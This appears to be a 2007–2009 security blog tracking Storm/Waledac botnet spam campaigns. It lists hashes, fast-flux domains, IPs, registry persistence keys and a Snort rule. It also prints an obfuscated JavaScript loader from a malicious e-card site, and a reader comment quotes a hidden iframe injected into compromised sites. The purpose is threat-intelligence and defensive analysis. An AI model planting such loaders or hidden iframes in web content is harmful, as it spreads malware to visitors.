Wednesday, April 22, 2009

Waledac SMS Spy Trojan

The Storm/Waledac group has released a new trojan, this time looking to trick unsuspecting users into downloading an application that will monitor their significant other's SMS messages.

The email I received is:
From: "Nina Reyes" 
To: REDACTED
Subject: Is your partner cheating on you?

Keep a spy eye on your Girlfriend's mobile hxxp://ytgga[.]eccellentesms[.]com/ 
(url obscured by me)
The sites page looks like this:

The link points to smsspy.exe or smstrap.exe, a Waledac variant. Mine had the following MD5 and SHA1 hashes:


083800074c6bad01e08b62f05d19ba66 smsspy.exe (MD5)
14c49220f43e2aa53af032a5205520f72ae9d8a4 smsspy.exe (SHA1)

DNS mining revealed the following fast flux domains in use by this same campaign:

adoresong.com. 0 IN A 121.136.197.42
cherishpoems.com. 0 IN A 76.94.66.148
chinamobilesms.com. 0 IN A 98.14.24.206
downloadfreesms.com. 0 IN A 121.136.197.42
freecolorsms.com. 0 IN A 87.110.53.209
freeservesms.com. 0 IN A 221.133.145.111
freesmsorange.com. 0 IN A 115.88.229.37
fryroll.com. 0 IN A 67.215.66.132
miosmsclub.com. 0 IN A 211.218.197.220
nuovosms.com. 0 IN A 82.67.178.75
smsclubnet.com. 0 IN A 121.191.206.66
smsinlinea.com. 0 IN A 173.33.75.204
smspianeta.com. 0 IN A 86.122.211.93
virtualesms.com. 0 IN A 211.218.197.220
worshiplove.com. 0 IN A 82.4.234.6
Looks like this campaign has been around for a few days. I had disregarded the messages as suspect pharmacy/ED spam.

Are you going to generate a blocklist or search your netflow for signs of infection? You can start with the 200 or so IPs in this text file: waledac-4-21-2009.txt.

Labels: , ,

posted by Nicholas at 03:46 0 Comments

Wednesday, December 31, 2008

Fast Flux Greeting Card Spam

Over the last several days my mail drops have been receiving several New Year and Christmas related greeting cards. It appears that these are all from the same group:
Thomas just mailed to you a Christmas Postcard. Your card will be available at:
http:// newyearcardonline. com/?cardnum=e830b6884376991e6a6960068c0a
Blessings to you from the ecards-gallery.com
(spaces added to protect from accidental clicks)

When visiting the site, you're greeted with a jpeg image as a web link. Any clicking on the jpeg will prompt you to download postcard.exe (or ecard.exe).


(snapshot taken on 12/30/2008 by DISOG)

The domains used by this group include:
bestchristmascard.com
bestyearcard.com
blackchristmascard.com
cardnewyear.com
cheapdecember.com
christmaslightsnow.com
decemberchristmas.com
directchristmasgift.com
freechristmassite.com
freechristmasworld.com
freedecember.com
funnychristmasguide.com
holidayxmas.com
itsfatherchristmas.com
justchristmasgift.com
livechristmascard.com
livechristmasgift.com
mirabellaclub.com
mirabellaonline.com
newlifeyearsite.com
newmediayearguide.com
newyearcardcompany.com
newyearcardfree.com
newyearcardonline.com
newyearcardservice.com
seocom.mobi
superchristmasday.com
superchristmaslights.com
superyearcard.com
themirabelladirect.com
themirabellahome.com
whitewhitechristmas.com
yourchristmaslights.com
yourdecember.com
youryearcard.com

The fast flux domains are registered with paycenter.com.cn. out of China. Whois Information on those domains is posted here. Paycenter.com.cn is known to host several phishing related domains as well.

The site inclues a one line javascript,
var kMIkfQBFc6XycsDCpstUGgN2IlVDNTr=Array(63,20,3,46,23,58,41,45,44,0,0,0,0,0,0,0,21,14,
22,25,40,47,34,7,15,4,10,42,55,30,48,49,28,29,5,27,51,8,2,19,53,1,59,0,0,0,0,9,0,37,6,32,50,16,57,
36,12,61,62,39,35,13,31,18,52,60,33,54,26,24,43,38,17,11,56),FDThSyHWyj0O6kV=
"CdqN4Whd94DX4ShwGsPpx4ikJKDX9vqNJEqFy2PpJJ8d_G8FbkhTbZqF@EPXtVqO@
sqrRtQpPkhNuMuNhSQX_WhLn38dy2qrSw6FhHqXIlhNSV",C7Et1fOaTBFVqCmFAMyas8KCrCdo48iEUDJ
=0,XSyj5GuMgbyK7p=0,mIFBLKV3Me0q4pIPy3U2w=0,idxbfk_aWcRW7,opFx77WKnhL60Qr83=
FDThSyHWyj0O6kV.length,jQTi=1024; window.status=' '; for(var eMURVlsMortMi3PphMd=Math.ceil(opFx77WKnhL60Qr83/jQTi);eMURVlsMortMi3PphMd>0;eMURVlsMortMi3PphMd--){idxbfk_aWcRW7='';
for(var BLgQQyHi=Math.min(opFx77WKnhL60Qr83,jQTi);BLgQQyHi>0;BLgQQyHi--,opFx77WKnhL60Qr83--){C7Et1fOaTBFVqCmFAMyas8KCrCdo48iEUDJ|=(kMIkfQBFc6XycsDCpstUGgN2IlVDNTr[FDThSyHWyj0O6kV.charCodeAt(mIFBLKV3Me0q4pIPy3U2w++)-48])<>=8;XSyj5GuMgbyK7p-=2} else XSyj5GuMgbyK7p=6}document.write(idxbfk_aWcRW7);}

When decoded that says:
<iframe src="http:// seofon. net/gold /click.pnp?eb0h" style="display:none"></iframe>
At this time, that site returns a "Forbidden" page.

The binary, postcard.exe has an MD5 hash of 31a8756b48576862e6312bdc063fa94. It is packed with UPX. When unpacked, it has the MD5 hash of 9f70846b6461cb881228bced7918f991.

Virus Total reports only 16 vendors catch this trojan:
File postcard.exe received on 12.31.2008 15:23:46 (CET)
AntivirusVersionLast UpdateResult
a-squared---
AhnLab-V3---
AntiVir--TR/Proxy.Gen
Authentium--W32/Downloader.F.gen!Eldorado
Avast---
AVG--Downloader.Generic_r.CL
BitDefender---
CAT-QuickHeal---
ClamAV---
Comodo---
DrWeb--Trojan.DownLoad.26732
eSafe--Suspicious File
eTrust-Vet---
Ewido---
F-Prot--W32/Downloader.F.gen!Eldorado
F-Secure--Suspicious:W32/Malware!Gemini
Fortinet--suspicious
GData---
Ikarus--Trojan.Win32.Waledac
K7AntiVirus---
Kaspersky---
McAfee---
McAfee+Artemis--Generic!Artemis
Microsoft--Trojan:Win32/Waledac.A
NOD32--a variant of Win32/Waledac
Norman---
Panda--Suspicious file
PCTools---
Prevx1---
Rising---
SecureWeb-Gateway--Trojan.Proxy.Gen
Sophos--Sus/Spy-B
Sunbelt---
Symantec--W32.Waledac
TheHacker---
TrendMicro---
VBA32---
ViRobot---
VirusBuster---

Additional information
MD5: 31a8756b48576862e6312bdc063fa94b
SHA1: b463b6d251a26a86a1f1472d6dbc0d953f4b4d5c
SHA256: 9fd8ae4b3bf5dcc239a3ea97e113683d1eb3ce564987109ccbeb2b2565c47d15
SHA512: f436e13c9b6886b5ea5367d906d10f3f6ad596b969f205f7ceab5bcc9a1f6044e5a08a2c74ab6e09071c86f8c8fc9fcb661920e34f0208fae663ad44f9a813d6

The binary contains a self signed certificate:
-----BEGIN CERTIFICATE-----
MIICxTCCAi6gAwIBAgIJALvFkWML/1R5MA0GCSqGSIb3DQEBBQUAMEwxCzAJBgNV
BAYTAkdCMRIwEAYDVQQIEwlCZXJrc2hpcmUxEDAOBgNVBAcTB05ld2J1cnkxFzAV
BgNVBAoTDk15IENvbXBhbnkgTHRkMB4XDTA3MTAyMTIwMTE0OFoXDTA3MTEyMDIw
MTE0OFowTDELMAkGA1UEBhMCR0IxEjAQBgNVBAgTCUJlcmtzaGlyZTEQMA4GA1UE
BxMHTmV3YnVyeTEXMBUGA1UEChMOTXkgQ29tcGFueSBMdGQwgZ8wDQYJKoZIhvcN
AQEBBQADgY0AMIGJAoGBAJ90+vC7isUhKB8oAzMB/wmE/ypICLU2o1nr8gVlSJC8
ZXYBIE1OAziASYadAJtN0Av6KW0su3Dh8GIJy7zJBP+i094w4Yy2B0pjtLr9g2Ng
nWwFGt/0GjEagemMayf6ADUtKiE3pGG9JrRiKC99TX31AJsjYSM3qsL4Q8lTITLJ
AgMBAAGjga4wgaswHQYDVR0OBBYEFC9d9isQdTjn6UnsfY0jzn1GM14QMHwGA1Ud
IwR1MHOAFC9d9isQdTjn6UnsfY0jzn1GM14QoVCkTjBMMQswCQYDVQQGEwJHQjES
MBAGA1UECBMJQmVya3NoaXJlMRAwDgYDVQQHEwdOZXdidXJ5MRcwFQYDVQQKEw5N
eSBDb21wYW55IEx0ZIIJALvFkWML/1R5MAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcN
AQEFBQADgYEAWYphFm/bi5HP7hmPEGt8j0JfxcvW8P1Wt2XCopO8GiwSOUnRFCCa
m+PIYZnuTSQMHOfQCjoCD2Ih+jEGu+bOpcHCly/Erd7swHo5WcGhFqpyyiTQt1Jj
bbDdKRpbzuY1pp1LxfwsoEadUi8wZ8HtIrg5tmd6J1IBkXh9e4z0rvk=
-----END CERTIFICATE-----
(/C=GB/ST=Berkshire/L=Newbury/O=My Company Ltd), It posts encrypted data to http:// mirabellaclub.com/ using the referer "Mozilla" which is highly unusual and could be used as a Snort signature to identify infected hosts:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"2009 Holiday Greeting Spam - Unusual Referer String (Mozilla)"; flow:to_server,established; content:"Referer\: Mozilla"; nocase; classtype:trojan-activity; sid:999999;)
The binary creates a registry key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PromoReg" which is used to launch the binary from the saved location (in my case, I placed it on the desktop).

This file does not install in the system directories, and auto restarts on reboot. This means even users who run with standard user privileges can become infected and join the botnet. If the binary is run as a normal user, the registry key is placed under "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\PromoReg".

I started mapping the FastFlux IP's and came up with about 150 unique ip addresses, which is available here.

Update 1: More information is available here:

http://www.symantec.com/norton/security_response/writeup.jsp?docid=2008-122308-1429-99&tabid=2
and here: http://isc.sans.org/diary.html?storyid=5557
and here: http://asert.arbornetworks.com/2008/12/another-holiday-another-e-card-run-waledec/

Update 2: Shadowserver has posted a great write up here:

http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081231

Labels: , , ,

posted by Nicholas at 14:18 0 Comments

Thursday, June 19, 2008

CME711's latest SE Spam



The Stormworm operators have recently updated their spam and web content. The webpage (capture to the right) is shown in its entirety. Users are then given the opportunity to download and run a malicious file, beijing.exe.

For the last couple months the Storm domains have been less fastfluxy - they change every 60 seconds instead of with every request. Perhaps this is because they simply are too small, or perhaps its because too many people are hitting the DNS servers, causing a Denial of Service attack.

Regardless, we've spotted the following domains in use:

biztech-co.cn, ratedhot.cn, fconnorlaw.cn, pacoast.cn, cadeaux-avenue.cn, likenewvideos.com, tellicolakerealty.cn, activeware.cn, grupogaleria.cn and polkerdesign.cn.


Please update your IDS accordingly.

Labels: , , , , , ,

posted by Nicholas at 01:47 0 Comments

Tuesday, October 16, 2007

0.0.0.0 - UPDATED.

Once again, CME711's domain resolvers are all pointing to 0.0.0.0 - which suggests another change is upon us.

What will it be this time? Baseball? My home team has just swept the Diamond Backs, and made it to the World Series. Congratulations to the Colorado Rockies! The last 22 games have been outstanding!

---

Update from Randy V:
They are back in full force. A nearly complete turn over of the active list from yesterday:
190.128.76.140 200.127.196.112 201.235.46.246 24.126.26.18 67.190.138.189 68.113.78.23 68.57.236.13 68.76.98.212 69.230.199.160 70.243.202.40 70.244.102.159 74.139.41.221 76.100.35.250 76.226.146.196 76.73.135.17 85.187.86.249 88.74.161.197
and the currently active list:
209.102.175.61 219.115.223.181 24.178.197.7 24.178.99.202 24.210.99.223 24.235.140.159 61.84.67.116 67.64.104.4 68.76.98.212 69.151.234.219 71.79.181.218 72.128.41.234 72.128.61.29 72.160.184.227 74.140.168.34 76.216.62.73 76.226.146.196 76.99.89.48 77.197.44.76 84.174.112.145 84.42.164.6 89.112.20.242 98.195.153.198 98.197.63.176
Only 201.235.46.246, 68.76.98.212 and 76.226.146.196 are in common. 76.226.146.196 is probably only a proxy.

Baseball does sound like a ripe target. There has not been a page change yet.

Update 2 (from Nicholas):
OpenDNS is null routing all CME711 domains. You can protect yourself from some of the effects of this trojan by changing your domain servers to 208.67.222.222 and 208.67.220.220. For more information visit the OpenDNS website.

Labels: , , , , , , ,

posted by Nicholas at 06:56 0 Comments

Saturday, September 08, 2007

Stormworm Tactics Change to Football Fungus

Some recent changes involving storm:

Starting about 13:50 GMT Randy V noticed the domains started rotating the IP's less frequently. Looking back at my logs I came up with this:

2007-09-08 13:49 (GMT): 12.216.204.171
2007-09-08 13:49 (GMT) - 2007-09-08 13:57 (GMT): 208.115.203.105
2007-09-08 13:58 (GMT) - 2007-09-08 14:03 (GMT): 76.226.146.196
2007-09-08 14:04 (GMT) - 2007-09-08 14:20 (GMT): 72.40.18.87
2007-09-08 14:21 (GMT) - 2007-09-08 14:30 (GMT): 209.30.158.167
2007-09-08 14:31 (GMT) - 2007-09-08 14:49 (GMT): 70.129.33.116
2007-09-08 14:50 (GMT) - 2007-09-08 15:15 (GMT): 74.73.209.16
2007-09-08 15:17 (GMT) - 2007-09-08 15:26 (GMT): 121.114.132.128
2007-09-08 15:26 (GMT) - 2007-09-08 15:34 (GMT): 75.132.218.100
2007-09-08 15:35 (GMT) - 2007-09-08 15:43 (GMT): 75.66.243.62
2007-09-08 15:44 (GMT) - NOW: 127.0.0.1

From 15:44 to ~17:00 the index page showed:

Welcome to nginx!

Now the index page is NFL related (and nicely done) which is sharing NFLTracker.exe (NFLTracker.exe - Infected: Trojan.Peed.III). Its not using any of the xor'd javascript or browser exploits. This page is strictly social engineering.

(DISOG Screen Capture: Sept 8, 2007)

Our guess is the domains will be changing soon, with football related names - or that there will be mass infection of football related sites with frames pointing to the peer pages.



UPDATE: Binary is now called 'tracker.exe'

Labels: , , , , ,

posted by Nicholas at 17:20 5 Comments

Sunday, August 12, 2007

Storm/Peed Nameserver Update

DISOG researcher Randy Vaughn has identified a new wrinkle with the Stormworm Nameservers. 364 of the identified nameservers are now functioning as open resolvers.

It is likely the storm gang may be preparing poisoned name servers operating behind network perimeters. If they did that they could use network sensitive IPs in order to mask the fact that infected users have had their network settings altered. If the machine owner was aware enough to examine their network settings they might overlook the presence of an IP within their ISP's address space as a DNS IP. I know my initial reaction would be, "oh Grandecom changed the DHCP provided DNS IPs once again", rather than, "hey, that IP doesn't look right." Were I to check the listed, but compromised, name server I would more than likely only verify that CNN went to CNN, and Apple.com went to Apple. I might not think to verify that mybank.com actually went to mybank. Please pay special attention to those SSL Certificates! Storm, all by itself, could cause widely-dispersed financial loss on a large scale; I wouldn't put it past the Storm team to launch targeted phishing attacks in the near future.

Of course there are other, much scarier things these guys could be planning.

I am not a big fan of customer blocks, but I feel this case warrants blocking inbound port 53 (tcp/udp), and outbound port 25 (tcp) traffic immediately.

Jeff Kell reminds us that this could be quite a subtle attack vector weeks or months down the road, even if the machine was cleaned of all malware.

Labels: , , , , ,

posted by Nicholas at 21:26 0 Comments

Saturday, August 11, 2007

Behold, the power of Storm

As expected, the Storm Botnet has been gaining strength over the last 6 weeks. Current estimates are in the hundreds of thousands, to a million drones.

Stormworm has been our primary focus over the last few weeks as well.

To date, DISOG has uncovered over

14376 unique storm related binaries,
3118 unique Storm Serving IPs,
258 supernode peers,
85 unique nameservers,
and 13 fast flux domains.

In total, we've identified 3420 unique IP addresses that have been under control of the stormworm author(s), and identifying themselves in one form or another. There are likely hundreds of thousands more drones that we are totally unaware of!

One of the storm worm fastflux domains appears to not be privacy hidden. I'm unclear if this is a slip up or a setup, but its interesting!
Domain Name: LTBREW.COM
Registrar: ESTDOMAINS, INC.
Whois Server: whois.estdomains.com
Referral URL: http://www.estdomains.com
Registrant:
Daniel Korwel (noviymoyma@yahoo.com)
N/A
Los-Angeles
CALI,53313
US
Tel. +1.3235212327


Keep posted, we will continue to update this page as we learn more.

Reader Comment (Pre-Site-Change:)

The fallowing code was injected into 4 of my websites:
------------------------------------
\"<iframe src=\"http://kqfloat.xxxcom/ind.php\" alt=\"BYDLOSHKA\"
height=\"1\" width=\"1\"></iframe>\"
------------------------------------
Remove the xxx in the domain name to get the virus/trojan horse in
your computer.
They use several other domains to host the Virus or Trojan Horse. When
I check the Whois all were PrivacyProtected, accept one. snlilac.com
shows the owner: http://www.whois.net/whois_new.cgi?d=snlilac&tld=com
When I search on "Daniel Korwel" in Google i found this news article.

What tells me that the hack of my websites is part of this Storm Botneck.
So I assume they have expanded from email to infiltrating websites to spread out the Worm.

Labels: , , , , , , ,

posted by Nicholas at 23:58 0 Comments